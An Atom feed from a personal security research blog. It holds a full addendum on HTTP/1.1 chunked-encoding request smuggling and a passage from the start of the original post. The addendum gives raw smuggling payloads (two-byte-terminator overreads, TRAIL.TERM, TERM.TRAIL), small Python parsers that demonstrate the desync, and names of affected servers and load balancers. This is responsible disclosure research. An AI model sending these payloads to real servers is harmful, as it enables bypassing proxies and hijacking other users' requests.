<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://w4ke.info/feed.xml" rel="self" type="application/atom+xml" /><link href="https://w4ke.info/" rel="alternate" type="text/html" /><updated>2026-01-18T18:58:29+00:00</updated><id>https://w4ke.info/feed.xml</id><title type="html">w4ke.info</title><subtitle>Jeppe&apos;s place.</subtitle><author><name>Jeppe Bonde Weikop</name></author><entry><title type="html">Funky chunks – addendum: a few more dirty tricks</title><link href="https://w4ke.info/2025/10/29/funky-chunks-2.html" rel="alternate" type="text/html" title="Funky chunks – addendum: a few more dirty tricks" /><published>2025-10-29T00:00:00+00:00</published><updated>2025-10-29T00:00:00+00:00</updated><id>https://w4ke.info/2025/10/29/funky-chunks-2</id><content type="html" xml:base="https://w4ke.info/2025/10/29/funky-chunks-2.html"><![CDATA[<style>
.http-line-break {
    background-color: rgba(165, 165, 165, 0.4);
    border-radius: 4px;
    margin: 0px;
    opacity: 0.65;
}

.http-highlight {
    display: block;
    padding: 0px 4px;
    border-radius: 8px;
    margin: 0px -4px;
}

.http-highlight-head {
    display: block;
    padding: 0px 4px;
    border-radius: 1px;
    border-top-left-radius: 8px;
    border-top-right-radius: 8px;
    margin: 0px -4px;
}

.http-highlight-one {
    background-color: #ffc6bf;
}

.http-highlight-two {
    background-color: #bfd3ff;
}

.http-highlight-three {
    background-color: #ffeabf;
}

.http-highlight-one-compl {
    background-color: #ffafa6;
}

.http-highlight-two-compl {
    background-color: #a6c2ff;
}

.http-highlight-three-compl {
    background-color: #ffe1a5;
}

.http-highlight-text {
    font-size: 12px;
    font-style: italic;
    color: #555;
    float: right;
    margin-right: 2px;
    margin-top: 2px;
}

.http-highlight-text-req {
    font-size: 12px;
    font-style: italic;
    color: #555;
    float: right;
    margin-right: 0px;
    margin-top: 0px;
}

.tooltip {
    position: relative;
    display: inline-block;
    cursor: pointer;
}

td {
  vertical-align: top;
  background-color: #fbfbfb;
}

.tooltip .tooltiptext {
    visibility: hidden;
    width: 140px;
    background-color: #f9f9f9;
    color: #333;
    text-align: center;
    border: 1px solid #ddd;
    border-radius: 5px;
    padding: 5px;
    position: absolute;
    z-index: 1;
    bottom: 105%;
    left: 50%;
    margin-left: -70px;
    box-shadow: 0px 4px 6px rgba(0, 0, 0, 0.1);
    opacity: 0;
    transition: opacity 0.2s ease-in-out;
}

.tooltip:hover .tooltiptext {
    visibility: visible;
    opacity: 1;
}
</style>

<p>After revisiting my own recent article introducing a small family of request smuggling techniques, I was struck by the realization that I had not quite drawn the family tree to completion. There are still a few branches left to trace – close relatives that until now have escaped our attention. To remedy this oversight, I have put together this short addendum in which we will finally make the proper introductions and welcome these neglected smuggling techniques into the family.</p>

<p>In the interest of brevity, I will not include an introduction here. To understand the context of this article, you will therefore need to read the <a href="https://w4ke.info/2025/06/18/funky-chunks">original one</a> first.</p>

<h3 id="the-curious-case-of-the-two-byte-terminator">The curious case of the two-byte terminator</h3>
<p>In <em>Funky chunks: abusing ambiguous chunk line terminators for request smuggling</em>, we surveyed a series of HTTP/1.1 chunked-body parsing leniencies. One of them, mentioned only briefly, now turns out to be of a fundamentally different nature than the others. In fact, as we will soon see, this particular leniency unlocks an entirely new subclass of chunk-based request smuggling techniques.</p>

<p>The leniency in question is the following: <em>accepting any two bytes as the line terminator of a chunk body</em>. A parser affected by such a leniency would interpret the highlighted <code class="language-plaintext highlighter-rouge">XX</code> sequence as a line terminator in the example chunked body below.</p>

<pre><code>d<span class="http-line-break">\r\n</span>
Hello, world!<span class="http-highlight-one-compl" style="padding: 0 0px;">XX</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</code></pre>

<p>This is a fairly common quirk, presumably because <em>only</em> the sequence <code class="language-plaintext highlighter-rouge">\r\n</code> is valid in this location. Many parsers simply skip two bytes, not bothering to confirm that the skipped sequence is in fact a CRLF. This behavior is (or rather, <em>was</em>) exhibited by parsers such as <a href="https://github.com/python-hyper/h11">h11</a>, <a href="https://github.com/openwrt/uhttpd">uHTTPd</a>, and even older versions of <a href="https://github.com/nodejs/llhttp">llhttp</a>.</p>
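<p>The difference between a strict parser and a two-byte-skipping one can be sketched in a few lines. This is my own illustration, not code from any of the parsers named above:</p>

```python
def parse_chunked(data: bytes, strict: bool = True) -> bytes:
    """Tiny chunked-body parser; with strict=False it skips two bytes
    after each chunk body without verifying that they are CRLF."""
    body, pos = b"", 0
    while True:
        eol = data.index(b"\r\n", pos)                  # chunk-size line
        size = int(data[pos:eol].split(b";")[0], 16)    # ignore extensions
        pos = eol + 2
        if size == 0:
            return body                                 # last chunk
        body += data[pos:pos + size]
        pos += size
        if strict and data[pos:pos + 2] != b"\r\n":
            raise ValueError("missing CRLF after chunk body")
        pos += 2                                        # lenient: any two bytes

# The example body above, with "XX" in place of the CRLF terminator:
funky = b"d\r\nHello, world!XX0\r\n\r\n"
parse_chunked(funky, strict=False)   # accepted anyway: b"Hello, world!"
```

<p>The lenient variant happily swallows the <code class="language-plaintext highlighter-rouge">XX</code> bytes, which is precisely the behavior we will exploit below.</p>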

<p>Now, recall another common leniency in chunk body parsing: <em>accepting a lone <code class="language-plaintext highlighter-rouge">\n</code> as a line terminator</em>, a technically incorrect yet highly prevalent behavior. Perhaps you already see where this is going.</p>

<h4 id="the-vulnerability">The vulnerability</h4>
<p>If either the front-end proxy or the back-end server assumes a two-byte CRLF without checking it, and the other accepts <code class="language-plaintext highlighter-rouge">\n</code> (or any other one-byte or zero-byte sequence) as a line terminator, <strong>chunk boundaries begin to blur</strong>. To see this, consider what happens when a chunk body with a one-byte line terminator is processed by a parser that carelessly advances two bytes after each chunk body. The parser will inadvertently consume a byte from the subsequent chunk header, effectively corrupting the chunk size. This causes the front-end and back-end parsers to disagree on the size of the next chunk, thereby enabling – <em>you guessed it</em> – HTTP request smuggling.</p>

<p>I see two variants of this new length-based technique:</p>

<ul>
  <li><strong>Front-end overread</strong>: The proxy interprets any two-byte sequence as a line terminator, and the server accepts either some one-byte line terminator (e.g. <code class="language-plaintext highlighter-rouge">\n</code>) or no line terminator at all.</li>
  <li><strong>Back-end overread</strong>: The proxy accepts either some one-byte line terminator (e.g. <code class="language-plaintext highlighter-rouge">\n</code>) or no line terminator at all, and the server interprets any two-byte sequence as a line terminator.</li>
</ul>

<p>It is worth noting that the parsing leniencies we are exploiting here are not actually any different from the ones described in my original blog post – these are just additional ways of combining leniencies to obtain a request smuggling primitive.</p>

<h4 id="example-1-byte-front-end-overread">Example: 1-byte front-end overread</h4>
<p>To keep things short, we’ll discuss only one of these variants in depth. I trust that you, dear reader, will be able to construct an equivalent attack for other variants, should the need arise.</p>

<p>Let us then consider arguably the most plausible scenario: a front-end accepting <code class="language-plaintext highlighter-rouge">\n</code> as a line terminator and a back-end accepting any two-byte sequence.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="display: flex; gap: 10px;">
<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">2;<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>xx<span class="http-line-break">\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">50<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span><span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
GET /two HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
X-Pad: AAAAA<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</span><span class="http-highlight http-highlight-three"><span class="http-highlight-head http-highlight-three-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span><span class="http-highlight-text"></span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">Proxy interpretation</p>
</div>

<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">2;<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>xx<span class="http-line-break">\n</span>5<span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span><span class="http-highlight-text"></span>
</span>GET /two HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #2</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
X-Pad: AAAAA<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span><span class="http-highlight-text"></span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">Server interpretation</p>
</div>
</div>
</div>

<p>The front-end interprets the <code class="language-plaintext highlighter-rouge">\n</code> as a line terminator and <code class="language-plaintext highlighter-rouge">50</code> as the size of the second chunk. On the back-end, the server consumes the first byte of the second chunk&#8217;s size, assuming it to be part of the line terminator. This changes the perceived size of the second chunk from <code class="language-plaintext highlighter-rouge">50</code> to <code class="language-plaintext highlighter-rouge">0</code>, causing the server to interpret it as the end of the request. What the front-end considers the content of the second chunk is therefore interpreted as a second pipelined request on the back-end.</p>
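<p>The disagreement can be reproduced with two toy parsing policies (my own simplification, not any real proxy or server). The payload below is the chunked body from the figure, with the headers of request #1 omitted:</p>

```python
def chunked_end(data: bytes, policy: str) -> int:
    """Offset at which this parser believes the chunked body ends.
    'lenient-lf': accept \\n or \\r\\n after a chunk body (the front-end)
    'skip-two'  : blindly skip two bytes after a chunk body (the back-end)"""
    pos = 0
    while True:
        eol = data.index(b"\r\n", pos)                # chunk-size line
        size = int(data[pos:eol].split(b";")[0], 16)
        pos = eol + 2
        if size == 0:
            return pos + 2                            # empty trailer: one more CRLF
        pos += size
        if policy == "skip-two":
            pos += 2                                  # consume any two bytes
        else:
            pos += 1 if data[pos:pos + 1] == b"\n" else 2

smuggle = (
    b"2;\r\nxx\n"                 # lone \n terminates the 2-byte chunk body
    b"50\r\n"                     # front-end: size 0x50; back-end eats "\n5"
    b"\r\nGET /two HTTP/1.1\r\nHost: localhost\r\n"
    b"X-Pad: AAAAA\r\nTransfer-Encoding: chunked\r\n"  # the 0x50-byte chunk body
    b"\r\n0\r\n\r\n"
)

chunked_end(smuggle, "lenient-lf")   # == len(smuggle): whole body consumed
chunked_end(smuggle, "skip-two")     # stops early: the rest is request #2
```

<p>The <code class="language-plaintext highlighter-rouge">skip-two</code> policy terminates right after the corrupted last chunk, leaving the embedded <code class="language-plaintext highlighter-rouge">GET /two</code> request behind as a pipelined request.</p>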

<h3 id="funky-trailers">Funky trailers</h3>
<p>We now move on from chunks and chunk sizes and instead turn our attention to another notable feature of HTTP/1.1 chunked encoding, a feature that we foolishly ignored in the original article despite its clear applicability to our request smuggling endeavors: the <a href="https://www.rfc-editor.org/rfc/rfc9112.html#name-chunked-trailer-section">chunked trailer section</a>.</p>

<p>The trailer section is essentially an optional header section following the last chunk of an HTTP message using chunked encoding. Let’s get familiar with the syntax by taking a look at an example.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="margin: auto; width: 420px;">
<pre><code>POST /some/path HTTP/1.1<span class="http-line-break">\r\n</span>
Host: example.com<span class="http-line-break">\r\n</span>
Content-Type: text/plain<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">d<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>hello, world!<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight http-highlight-two-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span></span><span class="http-highlight http-highlight-three-compl">Trailer-One: value-one<span class="http-line-break">\r\n</span><span class="http-highlight-text">trailer section</span>
Trailer-Two: value-two<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span></span></code></pre>
</div>
</div>

<p>I&#8217;ve noticed two common approaches to parsing the trailer section.</p>

<p>The first approach is to reuse the parsing logic for the header section. From a programmer’s perspective, this is a sensible choice – surely, one should not implement the same parsing logic twice! Unfortunately, there is a subtle but important difference between the headers and the trailers: <em>a lone newline is <strong>not</strong> an acceptable line terminator in the chunked trailer section.</em> As you may imagine, many parsers ignore this nuance and interpret a single <code class="language-plaintext highlighter-rouge">\n</code> as a line terminator in the trailer section anyway.</p>

<p>The second approach is to treat the trailer section much like the chunk extensions: consume it with no regard for its contents. This might seem like odd behavior, but it is a perfectly valid choice; the trailer section is optional metadata and <a href="https://www.rfc-editor.org/rfc/rfc9112.html#section-7.1.2-2:~:text=A%20recipient%20that%20removes%20the%20chunked%20coding%20from%20a%20message%20MAY%20selectively%20retain%20or%20discard%20the%20received%20trailer%20fields.">recipients are allowed to discard it</a>. Parsers employing this approach often look only for the <code class="language-plaintext highlighter-rouge">\r\n\r\n</code> sequence that marks the end of the trailer section, effectively (and erroneously) allowing any byte – including lone <code class="language-plaintext highlighter-rouge">\n</code> and <code class="language-plaintext highlighter-rouge">\r</code> characters – within the section.</p>
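<p>Both styles can be sketched in a few lines (assumed simplified implementations, not any specific server&#8217;s code). Given the same trailer bytes, they disagree on where the section ends:</p>

```python
def consume_trailers_scan(data: bytes, pos: int) -> int:
    """Style two: ignore the contents, just find the closing CRLFCRLF."""
    if data[pos:pos + 2] == b"\r\n":              # empty trailer section
        return pos + 2
    return data.index(b"\r\n\r\n", pos) + 4

def consume_trailers_lines(data: bytes, pos: int) -> int:
    """Style one: reuse a header parser that (incorrectly) also accepts
    a lone \\n as a line terminator; a blank line ends the section."""
    while True:
        nl = data.index(b"\n", pos)
        line = data[pos:nl].rstrip(b"\r")
        pos = nl + 1
        if line == b"":
            return pos

trailers = b"\nGET /two HTTP/1.1\r\nHost: localhost\r\n\r\n"
consume_trailers_scan(trailers, 0)    # consumes all of it
consume_trailers_lines(trailers, 0)   # stops after the first lone \n
```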

<p>These observations lead us to a brand-new set of exploitable parsing leniencies: by placing what one parser interprets as two consecutive line terminators in what another parser interprets as the trailer section, we have once again stumbled upon a new flavor of chunk-based request smuggling.</p>

<h4 id="trailterm">TRAIL.TERM</h4>
<p>Consider first the scenario in which the front-end proxy ignores lone <code class="language-plaintext highlighter-rouge">\n</code> characters in the chunked trailer section, but the back-end web server interprets them as line terminators. In such a scenario, we can smuggle a request past the front-end using the surprisingly simple payload below.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="display: flex; gap: 10px;">
<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">2<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>xx<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-highlight http-highlight-three-compl"><span class="http-line-break">\n</span><span class="http-highlight-text">trailer section</span>
GET /two HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">TRAIL interpretation (proxy)</p>
</div>

<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">2<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>xx<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight http-highlight-two-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\n</span>
</span>GET /two HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #2</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</code></pre>

<p style="text-align: center; font-weight: bold;">TERM interpretation (server)</p>
</div>
</div>
</div>

<p>The proxy ignores the lone newline following the last chunk, interpreting it as part of the trailer section. It perceives the remaining data &#8211; which the back-end interprets as a second request &#8211; as a chunked trailer section. Conveniently, the final two consecutive CRLF sequences serve both as the termination of the trailer section and as the end of the second pipelined request.</p>

<p><em><strong>Note</strong>: The first chunk is not strictly needed, but experience has taught me that some proxies rewrite requests with an empty body. The first chunk serves to prevent this rewriting behavior.</em></p>
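<p>To make the disagreement concrete, here is the payload above as raw bytes, together with where each parsing style believes the trailer section ends (my own simplified logic, not any particular implementation):</p>

```python
payload = (
    b"GET /one HTTP/1.1\r\nHost: localhost\r\n"
    b"Transfer-Encoding: chunked\r\n\r\n"
    b"2\r\nxx\r\n"
    b"0\r\n"
    b"\n"                                      # lone \n in the trailer section
    b"GET /two HTTP/1.1\r\nHost: localhost\r\n\r\n"
)

trailers = payload.index(b"\r\n0\r\n") + 5     # trailer section starts here

# TRAIL (proxy): only looks for the CRLFCRLF closing the trailer section.
proxy_end = payload.index(b"\r\n\r\n", trailers) + 4

# TERM (server): reads trailer lines, accepting a lone \n as a terminator,
# so the empty "\n" line immediately ends the trailer section.
server_end = trailers + 1

payload[proxy_end:]    # b"" - the proxy sees a single, complete request
payload[server_end:]   # starts with b"GET /two" - a second request appears
```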

<h4 id="termtrail">TERM.TRAIL</h4>
<p>As it turns out, the TERM.TRAIL scenario is quite a bit more complicated. Before we deep-dive into why, let’s first think about how we may construct an equivalent to the TRAIL.TERM payload above. In doing so, we quickly realize that we cannot <em>‘split’</em> a request as we usually would, because the <em>‘split’</em> can only occur on the front-end; once we add the ambiguous line terminators, the front-end interprets them as the end of the request. We have no way of splitting the request on the back-end instead.</p>

<p>There is a workaround, though: we can use <em>two</em> requests. This would perhaps more accurately be described as <em>‘request joining’</em> rather than <em>‘request splitting’</em>, because what the front-end perceives as two separate requests is squashed into a single request on the back-end – not the other way around.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="display: flex; gap: 10px;">
<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">2<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>xx<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight http-highlight-two-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\n</span>
</span>GET /two HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #2</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Content-Length: 40<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one">GET /three HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text">request body</span>
Host: localhost<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span></span></code></pre>

<p style="text-align: center; font-weight: bold;">TERM interpretation (proxy)</p>
</div>

<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">2<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>xx<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-highlight http-highlight-three-compl"><span class="http-line-break">\n</span><span class="http-highlight-text">trailer section</span>
GET /two HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Content-Length: 40<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</span>GET /three HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #2</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span></code></pre>

<p style="text-align: center; font-weight: bold;">TRAIL interpretation (server)</p>
</div>
</div>
</div>

<p>Using our two-request technique, it seems we have yet again managed to hide a request from the front-end parser. The back-end sees a trailer section where the front-end sees a second request, and as a result, the <code class="language-plaintext highlighter-rouge">Content-Length</code> header is ignored and the body of the second request is interpreted as a separate request on the back-end.</p>

<p>There is one major problem, however.</p>

<h4 id="the-early-response-problem">The early-response problem</h4>
<p>Consider what happens when a proxy receives these two pipelined requests. It will initially only forward what it interprets as the first request, which in turn is interpreted as an incomplete request on the back-end. Since the request is incomplete, the back-end will not return a response, and the proxy will eventually time out and therefore never forward the second request – the attack fails.</p>

<p>Until recently, I had dismissed TERM.TRAIL as unexploitable due to this inevitable upstream connection timeout. I later discovered that it <em>is</em> in fact exploitable against a small subset of web servers like AIOHTTP, Koa, and Actix Web, which respond <strong>before receiving the request body</strong> (unless the body is explicitly read by the application). Shortly after this realization, James Kettle introduced the concept of an <em><a href="https://portswigger.net/research/http1-must-die#breaking-the-0.cl-deadlock">early-response gadget</a></em> in his <a href="https://portswigger.net/research/http1-must-die">2025 HTTP desync research</a>, proving that even servers like nginx and IIS exhibit early-response behavior when rubbed the right way. We may therefore conclude that TERM.TRAIL <em>is</em> exploitable – with the added caveat that an early-response gadget is required.</p>

<p>Although Kettle’s work on early-response focused on 0.CL vulnerabilities, the idea is equally applicable to our TERM.TRAIL case; if the back-end responds early, the proxy will forward the second request, allowing the smuggled request to be delivered. It’s worth noting that unlike in 0.CL exploitation, here we do not have to worry about the lengths of any request headers added by the front-end.</p>

<h3 id="any-more-bounties">Any more bounties…?</h3>
<p>Armed with our newfound knowledge, it is only natural to wonder whether any more bounties or CVEs might be unearthed using these techniques. Unfortunately, the yields have been rather underwhelming.</p>

<p>Since the length-based techniques are only exploitable against parsing behaviors that I have already demonstrated to be dangerous, there are no additional CVEs to be issued. Scanning for these vulnerabilities across a range of bug bounty targets sadly yielded little success, perhaps partly because I had already reported these vulnerabilities to a dozen projects months ago.</p>

<p>Regarding trailer-based techniques, TRAIL.TERM remains a theoretical vulnerability, as none of the proxies I’ve tested exhibited the required parsing behavior. I did identify multiple TERM.TRAIL-vulnerable setups, including even a couple of real-world instances in bug bounty targets, but I was unable to find the necessary early-response gadgets in most cases. The only exploitable setup I did find was AIOHTTP behind Akamai, Imperva, or Google Classic Application LB, which has now been <a href="https://github.com/aio-libs/aiohttp/security/advisories/GHSA-9548-qrrj-x5pj">fixed</a>. Google Cloud even awarded a generous $13,337 bounty for the parsing flaw in their load balancer.</p>

<p>Safe to say, these vulnerabilities are by no means as prevalent as the ones discussed in <em>Funky chunks</em>. Nonetheless, I found them interesting to include in this addendum. If you wish to go looking for these vulnerabilities in the wild yourself, I’ve updated <a href="https://github.com/JeppW/smugchunks">smugchunks</a> with more blind detection payloads.</p>]]></content><author><name>Jeppe Bonde Weikop</name></author><summary type="html"><![CDATA[]]></summary></entry><entry><title type="html">Funky chunks: abusing ambiguous chunk line terminators for request smuggling</title><link href="https://w4ke.info/2025/06/18/funky-chunks.html" rel="alternate" type="text/html" title="Funky chunks: abusing ambiguous chunk line terminators for request smuggling" /><published>2025-06-18T00:00:00+00:00</published><updated>2025-06-18T00:00:00+00:00</updated><id>https://w4ke.info/2025/06/18/funky-chunks</id><content type="html" xml:base="https://w4ke.info/2025/06/18/funky-chunks.html"><![CDATA[<style>
.http-line-break {
    background-color: rgba(165, 165, 165, 0.4);
    border-radius: 4px;
    margin: 0px;
    opacity: 0.65;
}

.http-highlight {
    display: block;
    padding: 0px 4px;
    border-radius: 8px;
    margin: 0px -4px;
}

.http-highlight-head {
    display: block;
    padding: 0px 4px;
    border-radius: 1px;
    border-top-left-radius: 8px;
    border-top-right-radius: 8px;
    margin: 0px -4px;
}

.http-highlight-one {
    background-color: #ffc6bf;
}

.http-highlight-two {
    background-color: #bfd3ff;
}

.http-highlight-three {
    background-color: #ffeabf;
}

.http-highlight-one-compl {
    background-color: #ffafa6;
}

.http-highlight-two-compl {
    background-color: #a6c2ff;
}

.http-highlight-three-compl {
    background-color: #ffe1a5;
}

.http-highlight-text {
    font-size: 12px;
    font-style: italic;
    color: #555;
    float: right;
    margin-right: 2px;
    margin-top: 2px;
}

.http-highlight-text-req {
    font-size: 12px;
    font-style: italic;
    color: #555;
    float: right;
    margin-right: 0px;
    margin-top: 0px;
}

.tooltip {
    position: relative;
    display: inline-block;
    cursor: pointer;
}

td {
  vertical-align: top;
  background-color: #fbfbfb;
}

.tooltip .tooltiptext {
    visibility: hidden;
    width: 140px;
    background-color: #f9f9f9;
    color: #333;
    text-align: center;
    border: 1px solid #ddd;
    border-radius: 5px;
    padding: 5px;
    position: absolute;
    z-index: 1;
    bottom: 105%;
    left: 50%;
    margin-left: -70px;
    box-shadow: 0px 4px 6px rgba(0, 0, 0, 0.1);
    opacity: 0;
    transition: opacity 0.2s ease-in-out;
}

.tooltip:hover .tooltiptext {
    visibility: visible;
    opacity: 1;
}
</style>

<p>The HTTP/1.1 standard seems to be riddled with strange features that absolutely no one uses and no one even really knows about. Of course, HTTP implementers with an ambition of adhering to the specification need to support these protocol quirks anyway, and unfortunately, this often results in parsing logic that is lax or incomplete – after all, why bother enforcing strict syntax rules for protocol elements that aren’t used for anything anyway?</p>

<p>In this post, we will explore how seemingly innocuous leniencies in the parsing of chunked message bodies, particularly in line terminators, can result in request smuggling vulnerabilities in widely used servers and proxies. I will share new exploitation techniques and payloads, methods for black-box detection, and a few recent vulnerabilities found in well-known HTTP implementations.</p>

<h3 id="chunk-extensions-the-http-feature-nobody-asked-for">Chunk extensions: the HTTP feature nobody asked for</h3>
<p>We begin our journey in a strange and largely forgotten corner of the HTTP/1.1 specification, a section that feels unfamiliar even to those of us who spend our days staring at HTTP requests. As you may have guessed from the title, I am referring to <a href="https://datatracker.ietf.org/doc/html/rfc9112#name-chunk-extensions">section 7.1.1</a> of <a href="https://datatracker.ietf.org/doc/html/rfc9112">RFC 9112</a>, birthplace of the <em>chunk extension</em>.</p>

<blockquote>
  <p><strong>7.1.1. Chunk Extensions</strong></p>

  <p>The chunked coding allows each chunk to include zero or more chunk extensions, immediately following the chunk-size, for the sake of supplying per-chunk metadata (such as a signature or hash), mid-message control information, or randomization of message body size.</p>

  <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> chunk-ext      = *( BWS ";" BWS chunk-ext-name
                     [ BWS "=" BWS chunk-ext-val ] )

 chunk-ext-name = token
 chunk-ext-val  = token / quoted-string
</code></pre></div>  </div>
</blockquote>

<p>Chunk extensions are an optional feature for HTTP messages using <a href="https://en.wikipedia.org/wiki/Chunked_transfer_encoding">chunked transfer encoding</a>. Before we move on to discuss chunk extensions further, let us first briefly remind ourselves of the syntax of chunked-encoding HTTP messages.</p>

<p>Chunked transfer encoding is signaled by the <code class="language-plaintext highlighter-rouge">Transfer-Encoding: chunked</code> header. In such messages, the body is divided into <em>chunks</em>, each consisting of what we may refer to as a <em>chunk header</em> and a <em>chunk body</em>, both of which are terminated by a CRLF sequence. The chunk header consists of a hexadecimal number specifying the chunk size, optionally followed by any number of semicolon-separated <em>chunk extensions</em>. The chunk body contains the actual data being delivered, its length indicated by the header. The message ends when a zero-sized chunk is encountered.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="margin: auto; width: 420px;">
<pre><code>POST /some/path HTTP/1.1<span class="http-line-break">\r\n</span>
Host: example.com<span class="http-line-break">\r\n</span>
Content-Type: text/plain<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">9<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>some data<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
